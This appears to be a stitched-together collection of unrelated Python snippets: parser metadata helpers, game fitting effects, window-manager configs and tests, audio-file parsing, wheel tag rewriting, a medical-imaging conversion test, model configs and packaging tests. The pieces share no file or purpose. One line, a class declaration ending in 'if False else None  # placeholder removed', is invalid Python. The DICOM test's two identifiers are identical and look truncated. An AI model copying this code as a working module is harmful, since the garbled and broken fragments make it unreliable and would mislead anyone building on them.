                if (not hasattr(res_meta, 'end_line')):
                    res_meta.end_line = getattr(last_meta, 'container_end_line', last_meta.end_line)
                    res_meta.end_column = getattr(last_meta, 'container_end_column', last_meta.end_column)
                    res_meta.end_pos = getattr(last_meta, 'container_end_pos', last_meta.end_pos)
                    res_meta.empty = False
                res_meta.container_end_line = getattr(last_meta, 'container_end_line', last_meta.end_line)
                res_meta.container_end_column = getattr(last_meta, 'container_end_column', last_meta.end_column)
                res_meta.container_end_pos = getattr(last_meta, 'container_end_pos', last_meta.end_pos)
        return res

    def _pp_get_meta(self, children):
        """Return the first child's position carrier: a Tree's non-empty
        meta, a Token itself, or a ``__lark_meta__()`` result; None if no
        child has one."""
        for c in children:
            if ((self.node_filter is not None) and (not self.node_filter(c))):
                continue
            if isinstance(c, Tree):
                if (not c.meta.empty):
                    return c.meta
            elif isinstance(c, Token):
                return c
            elif hasattr(c, '__lark_meta__'):
                return c.__lark_meta__()
class Effect3656(BaseEffect):
    """Passive effect: boosts tracking speed of all turret (Gunnery) modules
    on the fit by the module's ``trackingSpeedBonus`` attribute."""
    type = 'passive'

    def handler(fit, module, context, projectionRange, **kwargs):
        # Stacking-penalized percentage bonus on every module that requires
        # the Gunnery skill.
        fit.modules.filteredItemBoost((lambda mod: mod.item.requiresSkill('Gunnery')), 'trackingSpeed', module.getModifiedItemAttr('trackingSpeedBonus'), stackingPenalties=True, **kwargs)
def get_svn_scm_data(info):
    """Render Subversion metadata into a human-readable multi-line string.

    ``info`` must provide the keys 'url', 'lastchg', 'author' and 'date';
    each field is printed on its own line, prefixed with the module-level
    ``indent`` string.
    """
    fields = [
        ('URL', 'url'),
        ('Last Changed Rev', 'lastchg'),
        ('Last Changed Author', 'author'),
        ('Last Changed Date', 'date'),
    ]
    lines = ['Svn info:\n']
    for caption, key in fields:
        lines.append(indent + caption + ': ' + info[key] + '\n')
    return ''.join(lines)
def demo_check_info(info: PackageInfo, requires_dist: (set[str] | None)=None) -> None:
    """Assert that ``info`` describes the demo 0.1.0 package.

    When ``requires_dist`` is given it must match exactly; otherwise accept
    either spelling of the environment-marker separator ("; " vs " ; "),
    which differs between metadata generators.
    """
    assert (info.name == 'demo')
    assert (info.version == '0.1.0')
    assert info.requires_dist
    if requires_dist:
        assert (set(info.requires_dist) == requires_dist)
    else:
        assert (set(info.requires_dist) in ({'cleo; extra == "foo"', 'pendulum (>=1.4.4)', 'tomlkit; extra == "bar"'}, {'cleo ; extra == "foo"', 'pendulum (>=1.4.4)', 'tomlkit ; extra == "bar"'}))
class Effect3703(BaseEffect):
    """Passive ship effect: Minmatar Cruiser skill bonus to the rate of fire
    ('speed' attribute) of light/heavy/heavy-assault missile launchers."""
    type = 'passive'

    def handler(fit, ship, context, projectionRange, **kwargs):
        # Only these launcher groups receive the hull bonus.
        groups = ('Missile Launcher Rapid Light', 'Missile Launcher Heavy', 'Missile Launcher Heavy Assault')
        fit.modules.filteredItemBoost((lambda mod: (mod.item.group.name in groups)), 'speed', ship.getModifiedItemAttr('shipBonusMC2'), skill='Minmatar Cruiser', **kwargs)
class ManagerConfig(Config):
    """Qtile configuration used by the manager tests: four groups, stack /
    tile / max layouts, extra float rules, and a bottom status bar."""
    auto_fullscreen = True
    groups = [libqtile.config.Group('a'), libqtile.config.Group('b'), libqtile.config.Group('c'), libqtile.config.Group('d')]
    layouts = [libqtile.layout.stack.Stack(num_stacks=1), libqtile.layout.stack.Stack(num_stacks=2), libqtile.layout.tile.Tile(ratio=0.5), libqtile.layout.max.Max()]
    # Stock float rules plus test windows matching class/title 'float'.
    floating_layout = libqtile.layout.floating.Floating(float_rules=[*libqtile.layout.floating.Floating.default_float_rules, Match(wm_class='float'), Match(title='float')])
    keys = [libqtile.config.Key(['control'], 'k', lazy.layout.up()), libqtile.config.Key(['control'], 'j', lazy.layout.down())]
    mouse = []
    screens = [libqtile.config.Screen(bottom=libqtile.bar.Bar([libqtile.widget.Prompt(), libqtile.widget.GroupBox()], 20))]
    follow_mouse_focus = True
    # Tests manage screens explicitly; do not auto-reconfigure.
    reconfigure_screens = False
def test_literals(converter: BaseConverter) -> None:
    """Union passthrough accepts values covered by the configured union and
    rejects values outside it (wrong type, or a str that is not the
    allowed Literal value)."""
    from typing import Literal
    union = Union[(int, str, None)]
    exact_type = Union[(int, Literal['test'], None)]
    configure_union_passthrough(union, converter)
    # int / matching literal / None all pass through unchanged, both ways.
    assert (converter.unstructure(1, exact_type) == 1)
    assert (converter.structure(1, exact_type) == 1)
    assert (converter.unstructure('test', exact_type) == 'test')
    assert (converter.structure('test', exact_type) == 'test')
    assert (converter.unstructure(None, exact_type) is None)
    assert (converter.structure(None, exact_type) is None)
    # A tuple is not a member of the union at all.
    with pytest.raises(TypeError):
        converter.structure((), exact_type)
    # 't' is a str, but not the permitted literal 'test'.
    with pytest.raises(TypeError):
        converter.structure('t', exact_type)
def measure_perplexity(predicted_indices, n_embed):
    """Codebook-usage statistics for a batch of VQ code indices.

    Returns ``(perplexity, cluster_use)``: perplexity is
    ``exp(-sum(p * log p))`` over the empirical code distribution (1e-10
    added inside the log for numerical safety), and cluster_use counts how
    many of the ``n_embed`` codes were used at least once.
    """
    one_hot = F.one_hot(predicted_indices, n_embed).float().reshape(-1, n_embed)
    usage = one_hot.mean(0)
    entropy = -(usage * torch.log(usage + 1e-10)).sum()
    perplexity = entropy.exp()
    cluster_use = (usage > 0).sum()
    return (perplexity, cluster_use)
class _ModelMixin():
    """Convenience iteration/access helpers mixed into Gtk.TreeModel
    subclasses."""
    # Marker consumed elsewhere: changes to this model are applied atomically.
    ATOMIC = True

    def get_value(self, iter_, column=0, _base=Gtk.TreeModel.get_value):
        # Column defaults to 0 (single-column model); _base is bound at
        # class-creation time to avoid a per-call attribute lookup.
        return _base(self, iter_, column)

    def get_n_columns(self):
        # This mixin models a single-column tree model.
        return 1

    def iter_changed(self, iter_):
        """Emit row-changed for the row at ``iter_``."""
        self.row_changed(self.get_path(iter_), iter_)

    def path_changed(self, path):
        """Emit row-changed for the row at ``path``."""
        self.row_changed(path, self.get_iter(path))

    def itervalues(self, iter_=None):
        """Yield the values of ``iter_``'s children (top level when None)."""
        iter_ = self.iter_children(iter_)
        # Hoist bound methods out of the loop for speed.
        getv = self.get_value
        inext = self.iter_next
        while iter_:
            (yield getv(iter_))
            iter_ = inext(iter_)

    def values(self):
        """Return all top-level values as a list."""
        return list(self.itervalues())

    def iterrows(self, iter_=None):
        """Yield ``(iter, value)`` pairs of ``iter_``'s children (top level
        when None)."""
        iter_ = self.iter_children(iter_)
        getv = self.get_value
        inext = self.iter_next
        while iter_:
            (yield (iter_, getv(iter_)))
            iter_ = inext(iter_)

    def is_empty(self):
        """True if the model holds no rows."""
        return (not self.get_iter_first())

    # Pre-initialized GObject.Value shared by _get_marshalable; it is deleted
    # from the class namespace below so it survives only as the method's
    # default argument.
    _value = GObject.Value()
    _value.init(GObject.TYPE_PYOBJECT)

    def _get_marshalable(self, obj, _value=_value):
        # Objects GI already marshals to PyObject can pass through directly;
        # everything else gets boxed in the shared GObject.Value.
        if _gets_marshaled_to_pyobject(obj):
            return obj
        _value.set_boxed(obj)
        return _value
    del _value
class MinNode(object):
    """Node of the reduced pattern tree used by the bottom matcher; supports
    extracting a linear "characteristic" subpattern from the tree."""

    def __init__(self, type=None, name=None):
        self.type = type            # token/symbol type, or TYPE_ALTERNATIVES / TYPE_GROUP
        self.name = name            # literal name for NAME tokens, if any
        self.children = []
        self.leaf = False
        self.parent = None
        self.alternatives = []      # subpatterns collected so far for an alternatives node
        self.group = []             # subpatterns collected so far for a group node

    def __repr__(self):
        return ((str(self.type) + ' ') + str(self.name))

    def leaf_to_root(self):
        """Walk from this leaf toward the root, accumulating the subpattern.

        Returns None when an alternatives/group node on the path is not yet
        saturated (other branches still need to report in); the shared
        ``alternatives``/``group`` accumulators persist across calls.
        """
        node = self
        subp = []
        while node:
            if (node.type == TYPE_ALTERNATIVES):
                node.alternatives.append(subp)
                if (len(node.alternatives) == len(node.children)):
                    # All branches collected: fold them into a single tuple entry.
                    subp = [tuple(node.alternatives)]
                    node.alternatives = []
                    node = node.parent
                    continue
                else:
                    # Wait until the remaining branches arrive.
                    node = node.parent
                    subp = None
                    break
            if (node.type == TYPE_GROUP):
                node.group.append(subp)
                if (len(node.group) == len(node.children)):
                    # Group complete: keep only its most characteristic branch.
                    subp = get_characteristic_subpattern(node.group)
                    node.group = []
                    node = node.parent
                    continue
                else:
                    node = node.parent
                    subp = None
                    break
            # Plain node: record its literal name (for named NAME tokens)
            # or its type.
            if ((node.type == token_labels.NAME) and node.name):
                subp.append(node.name)
            else:
                subp.append(node.type)
            node = node.parent
        return subp

    def get_linear_subpattern(self):
        """Return the first complete leaf-to-root subpattern found."""
        for l in self.leaves():
            subp = l.leaf_to_root()
            if subp:
                return subp

    def leaves(self):
        """Yield the leaf nodes of the subtree rooted at this node."""
        for child in self.children:
            (yield from child.leaves())
        if (not self.children):
            (yield self)
def test_ezkey():
    """EzKey parses emacs-style binding specs into modifiers + key, and
    rejects malformed specs with QtileError."""
    key = config.EzKey('M-A-S-a', cmd, cmd)
    (modkey, altkey) = (config.EzConfig.modifier_keys[i] for i in 'MA')
    assert (key.modifiers == [modkey, altkey, 'shift'])
    assert (key.key == 'a')
    assert (key.commands == (cmd, cmd))
    # Angle brackets allow multi-character key names.
    key = config.EzKey('M-<Tab>', cmd)
    assert (key.modifiers == [modkey])
    assert (key.key == 'Tab')
    assert (key.commands == (cmd,))
    # Trailing dash: no key given.
    with pytest.raises(utils.QtileError):
        config.EzKey('M--', cmd)
    # Unknown modifier letter.
    with pytest.raises(utils.QtileError):
        config.EzKey('Z-Z-z', cmd)
    # Not a binding spec at all.
    with pytest.raises(utils.QtileError):
        config.EzKey('asdf', cmd)
    # Modifier appearing after the key position.
    with pytest.raises(utils.QtileError):
        config.EzKey('M-a-A', cmd)
class OggFLACStreamInfo(StreamInfo):
    """Stream information for FLAC-in-Ogg (mapping version 1.0).

    Most attributes are copied from the embedded native FLAC stream info;
    ``serial`` is the Ogg serial number of the FLAC logical stream and
    ``packets`` the header packet count declared by the mapping header.
    """
    length = 0        # stream length in seconds; finalized in _post_tags
    channels = 0
    sample_rate = 0

    def __init__(self, fileobj):
        # Scan Ogg pages until the FLAC identification packet appears.
        page = OggPage(fileobj)
        while (not page.packets[0].startswith(b'\x7fFLAC')):
            page = OggPage(fileobj)
        # Mapping header: major/minor version, header packet count, 'fLaC'.
        (major, minor, self.packets, flac) = struct.unpack('>BBH4s', page.packets[0][5:13])
        if (flac != b'fLaC'):
            raise OggFLACHeaderError(('invalid FLAC marker (%r)' % flac))
        elif ((major, minor) != (1, 0)):
            # Only mapping version 1.0 is understood.
            raise OggFLACHeaderError(('unknown mapping version: %d.%d' % (major, minor)))
        self.serial = page.serial
        # The native FLAC STREAMINFO block follows the mapping header.
        stringobj = BytesIO(page.packets[0][17:])
        try:
            flac_info = FLACStreamInfo(stringobj)
        except FLACError as e:
            raise OggFLACHeaderError(e)
        for attr in ['min_blocksize', 'max_blocksize', 'sample_rate', 'channels', 'bits_per_sample', 'total_samples', 'length']:
            setattr(self, attr, getattr(flac_info, attr))

    def _post_tags(self, fileobj):
        # Derive the duration from the final granule position when the
        # STREAMINFO block did not carry a usable length.
        if self.length:
            return
        page = OggPage.find_last(fileobj, self.serial, finishing=True)
        if (page is None):
            raise OggFLACHeaderError
        self.length = (page.position / float(self.sample_rate))

    def pprint(self):
        return (u'Ogg FLAC, %.2f seconds, %d Hz' % (self.length, self.sample_rate))
def get_eval_dataset(cfg, root_dataset_path, eval_dataset_name, eval_binary_path):
    """Instantiate the instance-retrieval evaluation dataset matching
    ``eval_dataset_name`` under ``root_dataset_path``.

    Revisited-Oxford/Paris style datasets and INSTRE get their dedicated
    loaders; anything else falls back to the generic
    ``InstanceRetrievalDataset`` (which needs ``eval_binary_path``).
    """
    eval_data_path = f'{root_dataset_path}/{eval_dataset_name}'
    assert PathManager.exists(eval_data_path), f'Unknown path: {eval_data_path}'
    # Debug mode keeps only a handful of samples for quick iteration.
    num_samples = 20 if cfg.IMG_RETRIEVAL.DEBUG_MODE else None
    if is_revisited_dataset(eval_dataset_name):
        return RevisitedInstanceRetrievalDataset(eval_dataset_name, root_dataset_path)
    if is_instre_dataset(eval_dataset_name):
        return InstreDataset(eval_data_path, num_samples=num_samples)
    return InstanceRetrievalDataset(eval_data_path, eval_binary_path, num_samples=num_samples)
def test_fileinrewriterstep_in_list_and_out_with_formatting():
    """``path_in`` accepts a list: every entry (and ``path_out``) gets
    {token} substitutions applied from the context."""
    context = Context({'k1': 'v1', 'root': {'in': ['inpath{k1}here', '2', '{k1}'], 'out': 'outpath{k1}here'}})
    obj = FileInRewriterStep('blah.name', 'root', context)
    # All {k1} placeholders resolve to 'v1'.
    assert (obj.path_in == ['inpathv1here', '2', 'v1'])
    assert (obj.path_out == 'outpathv1here')
    assert (obj.context == context)
    assert (obj.logger.name == 'blah.name')
class FunctionContext():
    """Lightweight descriptor of a function being processed, with a lazily
    computed and cached fully-qualified name."""

    def __init__(self, module_name: str, name: str, docstring: (str | None)=None, is_abstract: bool=False, class_info: (ClassInfo | None)=None) -> None:
        self.module_name = module_name
        self.name = name
        self.docstring = docstring
        self.is_abstract = is_abstract
        self.class_info = class_info
        # Cache for fullname(); populated on first access.
        self._fullname: (str | None) = None

    def fullname(self) -> str:
        """Return ``module[.class].name``, computing it once and caching."""
        if self._fullname is None:
            parts = [self.module_name]
            if self.class_info:
                parts.append(self.class_info.name)
            parts.append(self.name)
            self._fullname = '.'.join(parts)
        return self._fullname
def add_platforms(wheel_ctx: InWheelCtx, platforms: list[str], remove_platforms: Iterable[str]=()) -> str:
    """Add (and optionally remove) platform tags in a wheel's filename and
    its WHEEL metadata.

    Must be called while ``wheel_ctx`` is entered (so the wheel contents are
    unpacked at ``wheel_ctx.path``).  Returns the output wheel path whose
    filename reflects the updated tag set; WHEEL metadata is rewritten on
    disk only when the tag list actually changed.
    """
    definitely_not_purelib = False
    if (wheel_ctx.path is None):
        raise ValueError('This function should be called from wheel_ctx context manager')
    # BUGFIX: remove_platforms may be any iterable (the default is a tuple);
    # copy to a list so the .append below cannot raise AttributeError or
    # mutate the caller's collection.
    remove_platforms = list(remove_platforms)
    info_fname = pjoin(_dist_info_dir(wheel_ctx.path), 'WHEEL')
    info = read_pkg_info(info_fname)
    # Output location: explicit out_wheel wins, else next to the CWD using
    # the input wheel's name as the basis.
    if (wheel_ctx.out_wheel is not None):
        out_dir = dirname(wheel_ctx.out_wheel)
        wheel_fname = basename(wheel_ctx.out_wheel)
    else:
        out_dir = '.'
        wheel_fname = basename(wheel_ctx.in_wheel)
    # --- filename platform tags ---
    (_, _, _, in_tags) = parse_wheel_filename(wheel_fname)
    original_fname_tags = sorted({tag.platform for tag in in_tags})
    logger.info('Previous filename tags: %s', ', '.join(original_fname_tags))
    fname_tags = [tag for tag in original_fname_tags if (tag not in remove_platforms)]
    fname_tags = unique_by_index((fname_tags + platforms))
    if (('any' in fname_tags) and (len(fname_tags) > 1)):
        # A wheel with concrete platform tags cannot also be 'any'; drop it
        # from both the filename and the WHEEL Tag entries.
        fname_tags.remove('any')
        remove_platforms.append('any')
        definitely_not_purelib = True
    if (fname_tags != original_fname_tags):
        logger.info('New filename tags: %s', ', '.join(fname_tags))
    else:
        logger.info('No filename tags change needed.')
    # Rebuild the filename with the '.'-joined platform tag set.
    fparts = {'prefix': wheel_fname.rsplit('-', maxsplit=1)[0], 'plat': '.'.join(fname_tags), 'ext': splitext(wheel_fname)[1]}
    out_wheel_fname = '{prefix}-{plat}{ext}'.format(**fparts)
    out_wheel = pjoin(out_dir, out_wheel_fname)
    # --- WHEEL metadata Tag entries ---
    in_info_tags = [tag for (name, tag) in info.items() if (name == 'Tag')]
    logger.info('Previous WHEEL info tags: %s', ', '.join(in_info_tags))
    # A tag is 'py_version-abi-platform'; keep the unique py/abi prefixes.
    pyc_apis = ['-'.join(tag.split('-')[:2]) for tag in in_info_tags]
    pyc_apis = unique_by_index(pyc_apis)
    # Cross every py/abi pair with each added platform; drop crosses with
    # each removed platform.
    wanted_tags = ['-'.join(tup) for tup in product(pyc_apis, platforms)]
    new_tags = [tag for tag in wanted_tags if (tag not in in_info_tags)]
    unwanted_tags = ['-'.join(tup) for tup in product(pyc_apis, remove_platforms)]
    updated_tags = [tag for tag in in_info_tags if (tag not in unwanted_tags)]
    updated_tags += new_tags
    if (updated_tags != in_info_tags):
        del info['Tag']
        for tag in updated_tags:
            info.add_header('Tag', tag)
        if definitely_not_purelib:
            info['Root-Is-Purelib'] = 'False'
            logger.info('Changed wheel type to Platlib')
        logger.info('New WHEEL info tags: %s', ', '.join(info.get_all('Tag')))
        write_pkg_info(info_fname, info)
    else:
        logger.info('No WHEEL info change needed.')
    return out_wheel
def test_convert_nifti_to_dicom(nifti_data, dicom_data):
    """Round-trip a NIfTI segmentation back to DICOM-RT and compare it to
    the original RTSTRUCT: patient identity must match exactly and contour
    extents must agree to within one pixel."""
    test_pat_id = 'LCTSC-Test-S1-101'
    ct_uid = '1.3.6.1.4.1.14519.5.2.1.7014.4598.'
    rtstruct_uid = '1.3.6.1.4.1.14519.5.2.1.7014.4598.'
    pat_path = dicom_data.joinpath(test_pat_id)
    ct_path = pat_path.joinpath(ct_uid)
    rtstruct_path = next(pat_path.joinpath(rtstruct_uid).glob('*.dcm'))
    # Collect the structure masks keyed by structure name (after the
    # 'RTSTRUCT_' prefix in the filename).
    masks = {}
    for mask_path in nifti_data.joinpath(test_pat_id).glob('STRUCTURES/*.nii.gz'):
        name = mask_path.name.split('.')[0].split('RTSTRUCT_')[1]
        masks[name] = str(mask_path)
    with tempfile.TemporaryDirectory() as temp_dir:
        output_file = Path(temp_dir).joinpath('test.dcm')
        convert_nifti(ct_path, masks, output_file)
        original = pydicom.read_file(rtstruct_path)
        rts = pydicom.read_file(output_file)
        assert (rts.Modality == original.Modality)
        assert (rts.PatientName == original.PatientName)
        assert (rts.PatientID == original.PatientID)
        # Map original ROI numbers to regenerated ones by case-insensitive name.
        contour_map = {}
        for i in original.StructureSetROISequence:
            for j in rts.StructureSetROISequence:
                if (j.ROIName.upper() == i.ROIName.upper()):
                    contour_map[int(i.ROINumber)] = int(j.ROINumber)
        assert (len(contour_map.keys()) == 5)
        # Compare the first ROI's contours slice by slice (matched on z).
        i = 1
        for j in original.ROIContourSequence[(i - 1)].ContourSequence:
            for k in rts.ROIContourSequence[(contour_map[i] - 1)].ContourSequence:
                if (j.ContourData[2] == k.ContourData[2]):
                    j_points = np.array(j.ContourData)
                    j_points = j_points.reshape(j.NumberOfContourPoints, 3)
                    k_points = np.array(k.ContourData)
                    k_points = k_points.reshape(k.NumberOfContourPoints, 3)
                    # Bounding boxes must agree within one pixel -- 0.83 is
                    # presumably the in-plane pixel spacing in mm; TODO confirm.
                    assert (max(abs((k_points.min(axis=0) - j_points.min(axis=0)))) < 0.83)
                    assert (max(abs((k_points.max(axis=0) - j_points.max(axis=0)))) < 0.83)
def _type(string, has_invisible=True):
    """Classify a cell value into the narrowest type used for column
    alignment: NoneType, int, float, bytes, or text.

    When ``has_invisible`` is true, invisible characters (e.g. ANSI color
    codes) are stripped first so colored numbers still classify as numbers.
    Values with an ``isoformat`` attribute (dates/datetimes) are treated as
    text. The checks are ordered narrowest-first.
    """
    if has_invisible and isinstance(string, (_text_type, _binary_type)):
        string = _strip_invisible(string)
    if string is None:
        return _none_type
    if hasattr(string, 'isoformat'):
        # datetime / date / time render as text, never as numbers.
        return _text_type
    if _isint(string):
        return int
    if _isnumber(string):
        return float
    if isinstance(string, _binary_type):
        return _binary_type
    return _text_type
@pytest.mark.parametrize('new_pages', [[[0, (210, 298)], [2, (420, 595)], [None, (842, 1190)]]])
def test_new_page_on_existing_pdf(new_pages):
    """Inserting pages at explicit indices (or appending with index=None)
    yields pages whose size matches the request."""
    pdf = pdfium.PdfDocument(TestResources.multipage)
    for (index, size) in new_pages:
        page = pdf.new_page(*size, index=index)
        if (index is None):
            # None means "append": the new page becomes the last one.
            index = (len(pdf) - 1)
        assert (page.get_size() == pdf.get_page_size(index) == size)
@add_arg_scope
def bottleneck(inputs, depth, depth_bottleneck, stride, rate=1, outputs_collections=None, scope=None):
    """ResNet v1 bottleneck residual unit (1x1 -> 3x3 -> 1x1 convolutions).

    Args:
        inputs: 4-D input tensor.
        depth: output channel count of the unit.
        depth_bottleneck: channel count of the inner 1x1/3x3 convs.
        stride: stride applied (in the 3x3 conv and shortcut).
        rate: atrous (dilation) rate for the 3x3 conv.
        outputs_collections: collection to add the unit's output to.
        scope: optional variable scope name.
    """
    with variable_scope.variable_scope(scope, 'bottleneck_v1', [inputs]) as sc:
        depth_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
        if (depth == depth_in):
            # Same width: identity shortcut, subsampled to match the stride.
            shortcut = resnet_utils.subsample(inputs, stride, 'shortcut')
        else:
            # Width change: projection shortcut via a linear 1x1 conv.
            shortcut = layers.conv2d(inputs, depth, [1, 1], stride=stride, activation_fn=None, scope='shortcut')
        residual = layers.conv2d(inputs, depth_bottleneck, [1, 1], stride=1, scope='conv1')
        residual = resnet_utils.conv2d_same(residual, depth_bottleneck, 3, stride, rate=rate, scope='conv2')
        # Final 1x1 is linear; the ReLU comes after the residual addition.
        residual = layers.conv2d(residual, depth, [1, 1], stride=1, activation_fn=None, scope='conv3')
        output = nn_ops.relu((shortcut + residual))
        return utils.collect_named_outputs(outputs_collections, sc.name, output)
def test_dbe_element_add():
    """Adding DualBasisElements (either operand order) and adding DualBases
    both yield a DualBasis; adding a non-element raises TypeError."""
    de = DualBasisElement()
    de_2 = DualBasisElement()
    db_0 = (de + de_2)
    assert isinstance(db_0, DualBasis)
    # Addition must also work with the operands swapped.
    db_0 = (de_2 + de)
    assert isinstance(db_0, DualBasis)
    # DualBasis + DualBasis composes into a DualBasis as well.
    db_1 = (db_0 + db_0)
    assert isinstance(db_1, DualBasis)
    with pytest.raises(TypeError):
        _ = (de + 2)
class ClientPerMessageDeflateTests(unittest.TestCase, PerMessageDeflateTestsMixin) if False else None  # placeholder removed
def get_config():
    """Config for VE-SDE NCSN++ on the BraTS MRI dataset (240x240 images,
    one channel), covering training, evaluation, sampling and optimizer."""
    config = get_default_configs()
    # --- training ---
    training = config.training
    training.batch_size = 64
    training.n_iters = 2400001
    training.snapshot_sampling = True
    training.sde = 'vesde'
    training.continuous = True
    # --- evaluation ---
    evaluate = config.eval
    evaluate.batch_size = 128
    evaluate.num_samples = 50000
    evaluate.ckpt_id = 26
    # --- sampling (MRI reconstruction task) ---
    sampling = config.sampling
    sampling.n_projections = 30
    sampling.task = 'mri'
    sampling.snr = 0.517
    sampling.coeff = 1.0
    # --- data ---
    data = config.data
    data.dataset = 'brats'
    data.image_size = 240
    data.num_channels = 1
    data.centered = False
    data.random_flip = False
    data.uniform_dequantization = False
    # --- model: NCSN++ backbone ---
    model = config.model
    model.name = 'ncsnpp'
    model.scale_by_sigma = True
    model.sigma_max = 128.0
    model.num_scales = 1000
    model.ema_rate = 0.999
    model.sigma_min = 0.01
    model.beta_min = 0.1
    model.beta_max = 20.0
    model.normalization = 'GroupNorm'
    model.nonlinearity = 'swish'
    model.nf = 32
    model.ch_mult = (1, 1, 2, 2, 2)
    model.num_res_blocks = 2
    model.attn_resolutions = (30,)
    model.dropout = 0.0
    model.resamp_with_conv = True
    model.conditional = True
    model.fir = True
    model.fir_kernel = [1, 3, 3, 1]
    model.skip_rescale = True
    model.resblock_type = 'biggan'
    model.progressive = 'output_skip'
    model.progressive_input = 'input_skip'
    model.progressive_combine = 'sum'
    model.attention_type = 'ddpm'
    model.init_scale = 0.0
    model.fourier_scale = 16
    model.conv_size = 3
    # --- optimizer ---
    optim = config.optim
    optim.weight_decay = 0
    optim.optimizer = 'Adam'
    optim.lr = 0.0002
    optim.beta1 = 0.9
    optim.amsgrad = False
    optim.eps = 1e-08
    optim.warmup = 5000
    optim.grad_clip = 1.0
    config.seed = 42
    return config
class RequirementsBundleTestCase(TestCase):
    """Tests for RequirementsBundle: file lookup, update-class selection, and
    iteration of updates/requirements."""

    def test_has_file(self):
        reqs = RequirementsBundle()
        self.assertEqual(reqs.has_file_in_path('foo.txt'), False)
        self.assertEqual(reqs.has_file_in_path(''), False)
        reqs.append(RequirementFile(path='foo.txt', content=''))
        self.assertEqual(reqs.has_file_in_path('foo.txt'), True)

    def test_add(self):
        # The bundle behaves like a list of RequirementFiles.
        reqs = RequirementsBundle()
        self.assertEqual(reqs, [])
        reqs.append(RequirementFile(path='foo.txt', content=''))
        self.assertEqual(reqs[0].path, 'foo.txt')

    def test_get_initial_update_class(self):
        req = RequirementsBundle()
        klass = req.get_update_class(initial=True, scheduled=False, config=None)
        self.assertEqual(klass, req.get_initial_update_class())

    def test_get_scheduled_update_class(self):
        req = RequirementsBundle()
        config = Mock()
        # A scheduled update is chosen only with a valid schedule.
        config.is_valid_schedule.return_value = True
        klass = req.get_update_class(initial=False, scheduled=True, config=config)
        self.assertEqual(klass, req.get_scheduled_update_class())

    def test_get_sequential_update_class(self):
        # Neither initial nor scheduled falls back to sequential updates.
        req = RequirementsBundle()
        klass = req.get_update_class(initial=False, scheduled=False, config=None)
        self.assertEqual(klass, req.get_sequential_update_class())

    def test_get_updates(self):
        # Patch out package resolution so no index access happens.
        with patch('pyup.requirements.Requirement.package', return_value=Mock()):
            reqs = RequirementsBundle()
            reqs.append(RequirementFile(path='r.txt', content='Bla'))
            updates = [u for u in reqs.get_updates(True, False, Mock())]
            self.assertEqual(len(updates), 1)
            reqs = RequirementsBundle()
            reqs.append(RequirementFile(path='r.txt', content='Bla'))
            updates = [u for u in reqs.get_updates(False, False, Mock())]
            self.assertEqual(len(updates), 1)

    def test_requirements(self):
        with patch('pyup.requirements.Requirement.package', return_value=Mock()):
            reqs = RequirementsBundle()
            # Two requirement lines yield two parsed Requirements, with
            # their (1-based) line numbers preserved.
            reqs.append(RequirementFile(path='r.txt', content='Bla\nFoo'))
            self.assertEqual([Requirement.parse('Bla', 1), Requirement.parse('Foo', 2)], [r for r in reqs.requirements])
def jetpack_missing(repository, hardware, version):
    """Build a pre-filled GitHub issue reporting that the detected L4T
    release is not yet known to jetson-stats, and print a hyperlink to it."""
    l4t = hardware['L4T']
    title = 'jetson-stats not supported for [L4T {l4t}]'.format(l4t=l4t)
    # Issue body: the L4T release plus the running jetson-stats version.
    body = ''.join([
        'Please update jetson-stats with new jetpack\n\n',
        '### Linux for Tegra\n\n',
        ' - L4T: ' + l4t + '\n\n',
        '### Jetson-Stats\n\n',
        ' - Version: ' + version + '\n',
    ])
    url = make_issue(repository, title, body=body, labels='Jetpack,missing', template='jetpack-missing.md')
    message = 'jetson-stats not supported for [L4T {l4t}]'.format(l4t=hardware['L4T'])
    hyperlink(message, url, 'open a Github issue')